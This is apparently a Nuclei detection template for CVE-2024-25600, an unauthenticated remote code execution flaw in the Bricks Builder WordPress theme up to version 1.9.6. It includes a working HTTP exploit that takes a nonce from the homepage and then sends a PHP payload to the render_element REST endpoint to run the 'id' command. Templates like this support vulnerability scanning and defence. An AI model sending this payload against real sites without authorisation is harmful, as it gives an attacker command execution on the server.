id: CVE-2024-25600 info: name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6 author: christbowel severity: critical description: | Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600 - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/ - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6 - https://github.com/Chocapikk/CVE-2024-25600 - https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation metadata: verified: true max-request: 2 publicwww-query: "/wp-content/themes/bricks/" tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST /wp-json/bricks/v1/render_element HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "postId": "1", "nonce": "{{nonce}}", "element": { "name": "container", "settings": { "hasLoop": "true", "query": { "useQueryEditor": true, "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);", "objectType": "post" } } } } matchers-condition: and matchers: - type: regex part: body regex: - "Exception:" - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)" condition: and extractors: - type: regex name: nonce part: body group: 1 regex: - 'nonce":"([0-9a-z]+)' internal: true # digest: 4a0a00473045022100a5bd80c7b1b78947e5625bc99d789dda7abab3a15d72d576e5e041a07373107702200f34940f17f5cb59266839d45826cad4832c7a1cb63955dd87d2ae154c68c50e:922c64590222798bb761d5b6d8e72950